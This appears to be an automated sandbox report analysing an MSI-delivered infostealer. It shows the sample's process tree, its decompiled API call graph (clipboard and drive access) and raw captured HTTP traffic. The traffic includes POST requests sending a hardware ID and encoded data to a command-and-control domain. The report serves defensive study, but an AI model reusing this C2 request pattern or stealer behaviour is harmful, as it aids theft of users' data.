                                                                                                    2025-01-13 07:29:19 UTC15331OUTData Raw: 40 a2 bf ff ad 7b 59 88 43 91 c8 9e 4b 8a c3 ea df 00 61 2f d1 12 f3 12 4b fc 32 29 b7 c0 0d ce fc 84 96 bc 76 09 c5 95 73 43 3b 44 58 3f 82 da 60 a4 27 06 28 f7 9d 98 9b 2a b2 d4 9b 4b 2a 5a 45 a2 73 fc f2 cb 70 92 a1 c1 c2 37 bc 5b a9 00 6d 1f c6 ba ff 3b 2a c6 99 97 39 b5 91 79 38 ff f5 7a 77 2b 70 f1 7c 2b 01 c2 8b 4e 85 2f b5 e7 fd ca b8 77 a3 8d 6d db 29 60 db ef c9 96 ed 49 11 32 4e 36 9a 8a 74 36 24 c9 64 c9 17 95 00 56 59 e4 45 5f dc a6 91 d0 c2 74 f9 82 a2 c4 29 19 0b 9b 10 4f 9e 43 39 2d 13 20 17 9f 1f 8f e0 37 8e 25 cd 6e 9f 7e b3 8f 53 8b 2a 6d f7 04 cf 68 5f 1b b3 73 83 12 bb 7d 08 dc 78 ae 2a 13 ae 34 42 3f ab af 89 ca 5a 2c 3e 44 2b 97 60 29 8a ec 59 6b 78 44 bc 30 c9 7d a7 35 e9 ae 41 90 7c db 56 6f df b6 ce df 46 a1 ee 67 bd 2d a6 0c 88
                                                                                                    Data Ascii: @{YCKa/K2)vsC;DX?`'(*K*ZEsp7[m;*9y8zw+p|+N/wm)`I2N6t6$dVYE_t)OC9- 7%n~S*mh_s}x*4B?Z,>D+`)YkxD0}5A|VoFg-
                                                                                                    2025-01-13 07:29:19 UTC15331OUTData Raw: 74 da bc 74 ad 35 9e e4 0e 1b d4 64 4e 47 3f aa 43 42 3e 0f cf dc 20 91 5a af cd 47 4e f6 4a 68 91 6c 48 f4 e4 14 11 b6 48 ed d9 05 4c c0 6b ff 08 ea f4 9e d9 87 5a c2 a6 06 6b bd 37 05 37 77 5a 77 8f 77 3a 77 e8 25 82 60 ab 54 98 ad cc 6d f8 86 48 2e 39 36 64 e1 10 71 b4 c5 a1 71 37 88 d2 97 6a dd da a9 36 a7 80 58 d6 85 fe c4 fe e9 97 3a e0 47 6f 43 8c 2a e7 bd 8c 52 53 6c c2 33 d5 45 5f 9e e4 d8 2c da b7 48 7d 26 a9 5d 9f fd f9 4f 21 35 e3 25 6a cd fa 5d c7 0d cb 94 52 d1 f4 f6 86 12 de f9 34 ea d4 15 bb c4 79 3f 5e 43 de 5e a9 40 eb 80 48 ca 32 71 d5 ab 44 7f 7b e2 f2 15 de bd ab 55 03 c1 03 67 67 60 bf 3b fd 25 1c f3 9c aa 09 e1 29 18 51 02 f7 26 09 69 10 d0 ff 1e ee 7a 3a eb 8c e4 41 93 1e b4 4b 95 4f ad 2e c2 b4 b5 37 07 ce c8 37 e6 bd 9e a7 3f ea
                                                                                                    Data Ascii: tt5dNG?CB> ZGNJhlHHLkZk77wZww:w%`TmH.96dqq7j6X:GoC*RSl3E_,H}&]O!5%j]R4y?^C^@H2qD{Ugg`;%)Q&iz:AKO.77?
                                                                                                    2025-01-13 07:29:19 UTC15331OUTData Raw: 59 24 e2 74 dc 83 a3 37 6e f4 22 00 e9 aa d6 bd 21 ca 31 55 e2 64 09 9b c2 6c 65 82 43 81 2c d8 3a 30 1c 03 e5 0a 80 2f d9 5d 45 ab e9 90 be 33 60 89 93 92 d0 a8 dc b4 46 10 2b 2f 0a e4 ff bc c4 c9 03 59 66 ec 93 9f b1 53 38 d8 ac 1d 07 f2 f5 51 d1 c9 56 06 0e a5 42 81 43 11 b9 69 7c d1 c8 61 34 66 d6 ba 86 36 47 5a b0 85 1b 79 88 9d 80 8d ed 3c f0 31 5f a3 da e5 2c f2 82 00 fc cb 32 b7 36 b9 ea 12 a7 e4 23 f6 34 5d 58 ec b2 40 cc f7 d1 9d 33 97 9f 59 ca f7 5e 98 b2 47 c7 f2 66 34 4d a9 99 b2 fa e9 1a 98 ff bc 56 f7 de 04 3e f6 03 a2 c9 ad a0 6e b6 ae f1 9a cb 20 de 1d 0b 6f 64 f7 dd 73 3f 30 2a 07 47 2a 92 ce 00 64 82 57 5c 0c e4 72 af fa 8d 8d 7d 20 5d 25 92 4e 50 28 72 c8 2e ec b8 28 88 39 b4 db 0a 4f 46 28 2a d5 4e c3 7a 15 f5 8d 5a d3 41 8a 9e 29 6f
                                                                                                    Data Ascii: Y$t7n"!1UdleC,:0/]E3`F+/YfS8QVBCi|a4f6GZy<1_,26#4]X@3Y^Gf4MV>n ods?0*G*dW\r} ]%NP(r.(9OF(*NzZA)o
                                                                                                    2025-01-13 07:29:19 UTC15331OUTData Raw: 71 89 b1 4d 59 a7 58 78 05 35 fd 39 b3 52 94 fb 6a 32 89 22 a5 ad f1 4b 54 bb 20 81 13 dd f5 6d de d8 32 d8 52 10 ac cd d5 6c 35 78 65 b9 a5 55 99 84 52 84 80 93 94 b6 ed e2 07 08 07 d1 7b fe 6f 45 68 f8 8e 5f 57 f8 e9 43 5d b2 46 f9 55 eb 3b 8e 95 ba 9d 9f 10 58 d8 2a c4 84 58 13 37 1b c8 ba 78 6c 11 bc 53 79 ce 14 17 19 a3 79 8d 48 6c 6a 65 dc 83 fd 6e 71 a0 fd 7f 6b 05 65 25 50 dc f7 89 46 01 63 b4 2a 44 0d 3c 43 77 81 13 22 a9 7c db df c6 68 29 bc c9 fb 91 94 c7 53 f8 d1 d7 58 9b cc f4 a7 f0 70 08 e4 e4 e3 bf 88 b0 4a 00 e3 07 e3 db 20 39 f0 8d 02 1f 62 2d ae 7a ea 01 e1 07 b3 40 cc 9e 5a d2 6c 6e 45 08 3e 5f 16 8d 2e e4 ca 5c 88 1b 50 4f c3 32 08 08 b7 ae a0 32 2f 9a 9c 63 a8 01 2a 91 31 83 2e 7e e4 2c c3 bb 6f f0 5c 61 12 0a 69 be bb 4f 09 fd db 13
                                                                                                    Data Ascii: qMYXx59Rj2"KT m2Rl5xeUR{oEh_WC]FU;X*X7xlSyyHljenqke%PFc*D<Cw"|h)SXpJ 9b-z@ZlnE>_.\PO22/c*1.~,o\aiO
                                                                                                    2025-01-13 07:29:19 UTC15331OUTData Raw: f0 44 89 4d 82 cf b6 1d 33 f3 43 f5 5d e7 29 b8 99 2a ea 1f 21 b3 5d 43 b7 5e d8 15 1a b0 f3 cc b1 41 5c d4 b0 e8 ef d7 91 d8 26 1e 87 f5 4a 08 d7 dd c7 48 13 0f 06 3f a0 85 43 63 56 c9 dc 86 29 32 5c 1c 8c 39 2e bc 8b c5 32 98 cf f9 e6 45 ff 1e c8 83 4f e7 d6 70 de 8b 2c 65 d9 27 52 35 74 95 12 bd e9 b2 36 5f 0d b8 25 be b7 64 85 25 2a f4 3e b6 bd 6d b5 c8 87 d3 fd c5 4d 2e f2 ee 24 ee e7 86 cf cd c5 8d e8 a5 36 79 85 ea da ed a2 6d af 93 c4 8f 07 d4 f1 91 54 e0 1f 11 ac ca ab f8 5a 86 d1 21 62 4b 33 69 8c d2 ae cc 25 16 f0 e1 fa 2f ba 18 fa 93 6e 42 38 aa 8c 83 7f b6 b3 53 0c 56 c8 d6 c8 52 32 87 a8 99 eb d4 36 f1 1a 1f b4 0f 10 11 81 2e e2 f2 91 53 4a ed a9 d8 de 55 d9 fe 88 ed b2 07 01 8b 13 bb e8 a7 91 4c 14 63 e4 9a c6 7e 09 e2 f7 e7 d6 79 27 0a 55
                                                                                                    Data Ascii: DM3C])*!]C^A\&JH?CcV)2\9.2EOp,e'R5t6_%d%*>mM.$6ymTZ!bK3i%/nB8SVR26.SJULc~y'U
                                                                                                    2025-01-13 07:29:19 UTC15331OUTData Raw: a2 97 c7 06 94 c6 fa 1f 9c 74 74 81 17 9d 55 22 a7 1a 29 e6 2e c5 ea ae d1 ea c3 ad 5b 2f 78 41 e3 aa 96 bd db e5 22 f7 be 27 32 d2 ad 2c 1e 44 8c 56 dd df 1f b9 92 47 b8 d3 b7 b1 a7 36 a8 da 66 0f a6 5f dd 1e 4f 4a 64 e3 6b cc 19 44 2e 09 26 e7 41 e2 c7 94 55 4a f6 69 a4 aa e5 34 59 8a 89 88 2c ed da d6 e8 b4 43 2d 5a 5b be 75 89 aa d5 a8 92 90 d4 6c 45 ae a1 b0 c8 f2 f4 51 71 4a 10 5a 28 69 c4 c7 95 ca 45 45 26 70 ab be 3b e2 0f 7a 89 6e e3 09 69 4c da f6 1c 96 7e da 4d fb 44 e5 9f 6b c9 07 e0 50 51 9e ac f4 9c d2 c8 82 5b 68 44 07 1a 5e ea fe 4f e9 19 83 2d ba cc cf 7b 6f 8c e8 82 54 25 82 d1 ff db 00 b6 6e cd ea 95 03 ed 0f 2a 4f fc 73 49 45 72 93 e6 0b 5b d4 3b 21 c3 eb 97 54 75 31 cc 62 2b ba 16 1b b0 58 59 37 df 63 43 a8 83 1b 04 dc a2 a1 18 1c 4a
                                                                                                    Data Ascii: ttU").[/xA"'2,DVG6f_OJdkD.&AUJi4Y,C-Z[ulEQqJZ(iEE&p;zniL~MDkPQ[hD^O-{oT%n*OsIEr[;!Tu1b+XY7cCJ
                                                                                                    2025-01-13 07:29:19 UTC15331OUTData Raw: f6 bb 4a dc aa 4c e9 1d c9 4a 47 c3 a8 70 d4 b5 68 ba 2c 37 30 4d 58 87 a3 bf 7d cd fe 56 46 0f 04 67 c2 79 83 4c d1 24 fd 46 e8 99 75 cb 4c 6b 35 b6 5f 3d 09 4f 2d dc f4 4b 65 df b2 23 b0 c6 6f 49 ec 52 95 a5 b0 5b df 63 d9 d8 5b 6a 01 36 70 04 2a 12 05 2b 7f d9 94 73 9c 74 41 2d cc 61 e0 67 ea 7c 62 df f7 0c 2f 68 c0 e8 86 f5 06 c2 09 d0 f0 10 de b7 eb ea dd dc da f5 60 f6 5f 9b 1a 3e 19 e9 6b 64 a6 49 d8 36 38 9a b2 eb bf 29 f7 55 3b 87 dd 05 f6 cf 75 c9 91 96 dd 88 d4 5f f3 b0 04 a2 f3 78 4b 5c 68 8d 65 be 8b 13 0e 1a 76 c6 92 dc 18 70 f8 9e 83 8d 8b 22 1d fd 5f 5f 2a a5 70 b5 f1 6f 76 50 d3 94 52 fe b5 da 36 50 19 c8 1f 33 cf 74 0b ef f3 41 b6 d4 96 a1 b1 7d ff 50 b3 f6 c7 fe 24 35 86 ac a4 47 24 d2 5a f7 87 05 ec 70 87 29 2a 32 2f 5c ec d5 c2 03 27
                                                                                                    Data Ascii: JLJGph,70MX}VFgyL$FuLk5_=O-Ke#oIR[c[j6p*+stA-ag|b/h`_>kdI68)U;u_xK\hevp"__*povPR6P3tA}P$5G$Zp)*2/\'
                                                                                                    2025-01-13 07:29:21 UTC1139INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 13 Jan 2025 07:29:21 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=rm674buc3juhfjn7ldhpkkcku7; expires=Fri, 09 May 2025 01:15:59 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    X-Frame-Options: DENY
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RCdJtxBAGg%2BTlBbWLekobx5%2BLU4lS1gp0NDZAs500dZ3HUK7gRY9XHzCfrxdoq4MQRm%2Fa%2F3z0rd1nDiLKmuXfKZWPNoixa2q8kzP%2FnTDfywq15kJwSABCO%2FCZEh88rZClgVHnwon"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 9013acb1dea84258-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2423&min_rtt=2419&rtt_var=917&sent=323&recv=568&lost=0&retrans=0&sent_bytes=2848&recv_bytes=554616&delivery_rate=1187957&cwnd=181&unsent_bytes=0&cid=0eb8f5271599b2ad&ts=1505&x=0"


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    7192.168.2.649781172.67.134.1974431708C:\Windows\SysWOW64\dxdiag.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-13 07:29:21 UTC267OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 80
                                                                                                    Host: fixxyplanterv.click
                                                                                                    2025-01-13 07:29:21 UTC80OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 5a 71 63 68 4f 61 2d 2d 6e 65 77 26 6a 3d 26 68 77 69 64 3d 39 37 36 45 32 35 45 42 46 43 38 33 39 46 44 44 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39
                                                                                                    Data Ascii: act=get_message&ver=4.0&lid=ZqchOa--new&j=&hwid=976E25EBFC839FDD5EC6468C5C963249
                                                                                                    2025-01-13 07:29:21 UTC1121INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 13 Jan 2025 07:29:21 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=0re3tbgc1q4l80n3dm1bi9i0gk; expires=Fri, 09 May 2025 01:16:00 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    X-Frame-Options: DENY
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=szJZoLIkzljmGlMJ3WyDWEjdeOOhgcCGF63dQp5Evqd2Gim3levZJvWaAsmyNcryUZ703IbkDdPJKkL5l3561MYcsjexyJ5QHIgOhMNKjImNk6LWUevbNud7kDlNgor%2FI9KyGF6S"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 9013acbe8b9480cd-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1607&rtt_var=621&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=983&delivery_rate=1734997&cwnd=178&unsent_bytes=0&cid=3db81c2d150388b8&ts=338&x=0"
                                                                                                    2025-01-13 07:29:21 UTC54INData Raw: 33 30 0d 0a 69 46 45 4d 58 36 49 37 69 4d 62 47 2f 7a 4b 2f 63 39 68 6e 53 4b 5a 6a 69 36 36 73 55 30 67 70 48 47 4b 31 4a 50 43 50 54 46 62 54 44 41 3d 3d 0d 0a
                                                                                                    Data Ascii: 30iFEMX6I7iMbG/zK/c9hnSKZji66sU0gpHGK1JPCPTFbTDA==
                                                                                                    2025-01-13 07:29:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:02:29:06
                                                                                                    Start date:13/01/2025
                                                                                                    Path:C:\Windows\System32\msiexec.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\msit.msi"
                                                                                                    Imagebase:0x7ff7b21b0000
                                                                                                    File size:69'632 bytes
                                                                                                    MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:2
                                                                                                    Start time:02:29:06
                                                                                                    Start date:13/01/2025
                                                                                                    Path:C:\Windows\System32\msiexec.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                    Imagebase:0x7ff7b21b0000
                                                                                                    File size:69'632 bytes
                                                                                                    MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    Target ID:3
                                                                                                    Start time:02:29:07
                                                                                                    Start date:13/01/2025
                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 031803DE2C6D91C23BF4AB9F8F38A8DE
                                                                                                    Imagebase:0xaa0000
                                                                                                    File size:59'904 bytes
                                                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:4
                                                                                                    Start time:02:29:08
                                                                                                    Start date:13/01/2025
                                                                                                    Path:C:\Windows\Installer\MSIAEB.tmp
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\Installer\MSIAEB.tmp"
                                                                                                    Imagebase:0x7ff78e210000
                                                                                                    File size:13'084'160 bytes
                                                                                                    MD5 hash:4D82074854750FDBA89D76624CC1E6F6
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    • Detection: 63%, ReversingLabs
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:5
                                                                                                    Start time:02:29:09
                                                                                                    Start date:13/01/2025
                                                                                                    Path:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:222'720 bytes
                                                                                                    MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    Target ID:6
                                                                                                    Start time:02:29:09
                                                                                                    Start date:13/01/2025
                                                                                                    Path:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                                                                    Imagebase:0x5a0000
                                                                                                    File size:222'720 bytes
                                                                                                    MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    Reset < >
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.2194130959.00007FF78E211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78E210000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.2194112360.00007FF78E210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.2194396747.00007FF78E2FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.2195787706.00007FF78ECFC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.2195898065.00007FF78EE3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.2195919962.00007FF78EE41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.2195939206.00007FF78EE47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ff78e210000_MSIAEB.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2933794660-0
                                                                                                      • Opcode ID: b3714b1e3f62d450d5574a026c88cc5e2d9c1db1de04dfe777e3adf5dec47836
                                                                                                      • Instruction ID: 041a8065bc1fbbc0b11d9a697b117d09562be7c1c5bd7c8bf2b7ff173bd91f7f
                                                                                                      • Opcode Fuzzy Hash: b3714b1e3f62d450d5574a026c88cc5e2d9c1db1de04dfe777e3adf5dec47836
                                                                                                      • Instruction Fuzzy Hash: C9111C32B14F028AEB009BA0E8542B873B4FB59B58F940E31EE6D467A4DFB8D165C750

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:8.8%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:68.9%
                                                                                                      Total number of Nodes:296
                                                                                                      Total number of Limit Nodes:24
                                                                                                      execution_graph 13888 408920 13890 40892c 13888->13890 13889 408a83 ExitProcess 13890->13889 13891 408941 GetCurrentProcessId GetCurrentThreadId 13890->13891 13894 408a0f 13890->13894 13892 408967 13891->13892 13893 40896b GetForegroundWindow 13891->13893 13892->13893 13893->13894 13894->13889 13895 431262 13896 431267 13895->13896 13897 43129d GetSystemMetrics GetSystemMetrics 13896->13897 13898 4312dc 13897->13898 13899 40d2e1 13900 40d2f0 13899->13900 13900->13900 13902 40d38a 13900->13902 13903 439e40 LdrInitializeThunk 13900->13903 13903->13902 13904 43a361 13905 43a3a0 13904->13905 13905->13905 13906 43a4ce 13905->13906 13908 439e40 LdrInitializeThunk 13905->13908 13908->13906 13909 420720 13910 42072e 13909->13910 13913 420780 13909->13913 13915 420840 13910->13915 13912 4207fc 13912->13913 13914 41ec80 RtlAllocateHeap RtlReAllocateHeap LdrInitializeThunk 13912->13914 13914->13913 13916 420850 13915->13916 13916->13916 13917 43c3b0 LdrInitializeThunk 13916->13917 13918 42091f 13917->13918 13582 438640 13583 438660 13582->13583 13584 43869e 13583->13584 13590 439e40 LdrInitializeThunk 13583->13590 13589 43878f 13584->13589 13591 4385e0 13584->13591 13587 438737 13587->13589 13594 439e40 LdrInitializeThunk 13587->13594 13590->13584 13595 43b690 13591->13595 13593 4385ea RtlAllocateHeap 13593->13587 13594->13589 13596 43b6a0 13595->13596 13596->13593 13596->13596 13597 40dbc4 13598 40dbd0 13597->13598 13627 4227b0 13598->13627 13600 40dbd6 13637 422e10 13600->13637 13602 40dbf2 13641 4230c0 13602->13641 13604 40dc0e 13647 424dd0 13604->13647 13608 40dc30 13667 425800 13608->13667 13610 40dc39 13680 4303f0 OpenClipboard 13610->13680 13612 40dc83 13613 4227b0 3 API calls 13612->13613 13614 40dca2 13613->13614 13615 422e10 2 API calls 13614->13615 13616 40dcbe 13615->13616 13617 4230c0 2 API calls 13616->13617 13618 40dcda 13617->13618 13619 424dd0 3 API calls 13618->13619 13620 40dcf3 13619->13620 13621 425480 2 API calls 13620->13621 13622 40dcfc 13621->13622 13623 425800 2 API calls 13622->13623 13624 40dd05 13623->13624 13625 4303f0 6 API calls 13624->13625 13626 40dd4f 13625->13626 13633 422830 13627->13633 13628 42292c 13628->13600 13629 422b91 GetLogicalDrives 13632 43c3b0 LdrInitializeThunk 13629->13632 13631 422a20 13631->13629 13631->13631 13634 422bb4 13631->13634 13635 422ba3 13631->13635 13632->13635 13633->13628 13633->13631 13633->13633 13687 43c3b0 13633->13687 13634->13600 13635->13634 13691 420b10 13635->13691 13640 422e20 13637->13640 13638 422fa0 13638->13602 13638->13638 13640->13638 13712 43ccf0 13640->13712 13642 4230ce 13641->13642 13722 43c8f0 13642->13722 13644 43ccf0 2 API calls 13646 422e20 13644->13646 13645 422fa0 13645->13604 13645->13645 13646->13644 13646->13645 13648 425040 13647->13648 13649 40dc27 13647->13649 13653 424df6 13647->13653 13657 425058 13647->13657 13727 439de0 13648->13727 13659 425480 13649->13659 13650 43ccf0 2 API calls 13650->13653 13652 43c8f0 LdrInitializeThunk 13652->13657 13653->13648 13653->13649 13653->13650 13653->13653 13654 43c8f0 LdrInitializeThunk 13653->13654 13653->13657 13654->13653 13657->13649 13657->13652 13658 439e40 LdrInitializeThunk 13657->13658 13733 43ca10 13657->13733 13741 43d400 13657->13741 13658->13657 13660 4254a0 13659->13660 13661 4254ee 13660->13661 13753 439e40 LdrInitializeThunk 13660->13753 13663 4385e0 RtlAllocateHeap 13661->13663 13666 4255fe 13661->13666 13664 425592 13663->13664 13664->13666 13754 439e40 LdrInitializeThunk 13664->13754 13666->13608 13755 425820 13667->13755 13669 425814 13669->13610 13670 425809 13670->13669 13774 436800 13670->13774 13672 43c210 LdrInitializeThunk 13675 42603b 13672->13675 13675->13672 13676 426065 13675->13676 13677 426476 13675->13677 13781 43c550 13675->13781 13785 43c620 13675->13785 13676->13610 13677->13676 13791 439e40 LdrInitializeThunk 13677->13791 13679 4267fd 13681 43058b 13680->13681 13682 430418 GetWindowLongW GetClipboardData 13680->13682 13681->13612 13683 430583 CloseClipboard 13682->13683 13684 43044f GlobalLock 13682->13684 13683->13681 13686 430465 13684->13686 13685 430575 GlobalUnlock 13685->13683 13686->13685 13688 43c3d0 13687->13688 13689 43c4fe 13688->13689 13703 439e40 LdrInitializeThunk 13688->13703 13689->13631 13704 43c210 13691->13704 13693 42123d 13693->13634 13694 420b50 13694->13693 13695 4385e0 RtlAllocateHeap 13694->13695 13696 420b8e 13695->13696 13702 420bf8 13696->13702 13708 439e40 LdrInitializeThunk 13696->13708 13698 4385e0 RtlAllocateHeap 13698->13702 13699 4211c5 13699->13693 13710 439e40 LdrInitializeThunk 13699->13710 13702->13698 13702->13699 13709 439e40 LdrInitializeThunk 13702->13709 13703->13689 13706 43c230 13704->13706 13705 43c35e 13705->13694 13706->13705 13711 439e40 LdrInitializeThunk 13706->13711 13708->13696 13709->13702 13710->13699 13711->13705 13713 43cd10 13712->13713 13714 43cd5e 13713->13714 13720 439e40 LdrInitializeThunk 13713->13720 13716 4385e0 RtlAllocateHeap 13714->13716 13719 43ce8e 13714->13719 13717 43ce0f 13716->13717 13717->13719 13721 439e40 LdrInitializeThunk 13717->13721 13719->13640 13720->13714 13721->13719 13724 43c910 13722->13724 13723 43c9df 13723->13646 13724->13723 13726 439e40 LdrInitializeThunk 13724->13726 13726->13723 13728 439df8 13727->13728 13729 439e1a 13727->13729 13732 439e20 13727->13732 13731 439e0b RtlReAllocateHeap 13728->13731 13728->13732 13730 4385e0 RtlAllocateHeap 13729->13730 13730->13732 13731->13732 13732->13657 13734 43ca40 13733->13734 13735 43ca98 13734->13735 13749 439e40 LdrInitializeThunk 13734->13749 13737 4385e0 RtlAllocateHeap 13735->13737 13740 43cb93 13735->13740 13738 43cb16 13737->13738 13738->13740 13750 439e40 LdrInitializeThunk 13738->13750 13740->13657 13740->13740 13742 43d411 13741->13742 13743 43d53e 13742->13743 13751 439e40 LdrInitializeThunk 13742->13751 13744 4385e0 RtlAllocateHeap 13743->13744 13748 43d65f 13743->13748 13746 43d5c3 13744->13746 13746->13748 13752 439e40 LdrInitializeThunk 13746->13752 13748->13657 13749->13735 13750->13740 13751->13743 13752->13748 13753->13661 13754->13666 13756 425860 13755->13756 13756->13756 13792 438640 13756->13792 13758 4258ce 13800 4388c0 13758->13800 13763 425d2b 13763->13670 13764 425985 13764->13763 13765 4258e6 13764->13765 13769 425e7f 13764->13769 13812 438cd0 13764->13812 13816 438a00 13765->13816 13767 43c210 LdrInitializeThunk 13767->13769 13768 43c550 LdrInitializeThunk 13768->13769 13769->13670 13769->13763 13769->13767 13769->13768 13770 43c620 LdrInitializeThunk 13769->13770 13771 426476 13769->13771 13770->13769 13771->13763 13820 439e40 LdrInitializeThunk 13771->13820 13773 4267fd 13777 436830 13774->13777 13775 43c8f0 LdrInitializeThunk 13775->13777 13776 43ccf0 2 API calls 13776->13777 13777->13775 13777->13776 13778 436968 13777->13778 13779 43d400 2 API calls 13777->13779 13828 439e40 LdrInitializeThunk 13777->13828 13778->13675 13779->13777 13782 43c580 13781->13782 13782->13782 13783 43c5ce 13782->13783 13829 439e40 LdrInitializeThunk 13782->13829 13783->13675 13787 43c650 13785->13787 13786 43c69e 13788 43c73e 13786->13788 13831 439e40 LdrInitializeThunk 13786->13831 13787->13786 13830 439e40 LdrInitializeThunk 13787->13830 13788->13675 13791->13679 13793 438660 13792->13793 13794 43869e 13793->13794 13821 439e40 LdrInitializeThunk 13793->13821 13795 4385e0 RtlAllocateHeap 13794->13795 13799 43878f 13794->13799 13797 438737 13795->13797 13797->13799 13822 439e40 LdrInitializeThunk 13797->13822 13799->13758 13801 4258da 13800->13801 13802 4388d1 13800->13802 13801->13764 13801->13765 13804 438d70 13801->13804 13802->13801 13823 439e40 LdrInitializeThunk 13802->13823 13805 438dc0 13804->13805 13807 438dfe 13805->13807 13824 439e40 LdrInitializeThunk 13805->13824 13806 43959e 